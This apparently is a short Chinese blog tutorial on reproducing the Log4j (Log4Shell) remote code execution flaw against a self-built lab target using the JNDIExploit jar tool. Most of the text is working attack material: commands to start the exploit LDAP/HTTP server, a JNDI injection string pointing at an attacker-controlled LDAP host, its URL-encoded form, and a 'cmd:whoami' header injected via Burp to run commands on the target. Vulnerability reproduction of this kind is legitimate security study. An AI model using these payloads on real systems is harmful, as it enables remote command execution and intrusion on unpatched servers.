JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

1.首先搭建log4j靶场
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用_第1张图片
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用_第2张图片

2.开启服务
Windows攻击端执行以下命令
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
在这里插入图片描述

再开一个cmd可以看下能用什么payload
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用_第3张图片

以上payload都可以尝试,我们使用
ldap://null:1389/TomcatBypass/TomcatEcho
3.构造请求
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
转成URL
%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4.开启bp
请求包中增加cmd:whoami
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用_第4张图片

执行后发现命令可以执行
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用_第5张图片

你可能感兴趣的:(jar,log4j,java)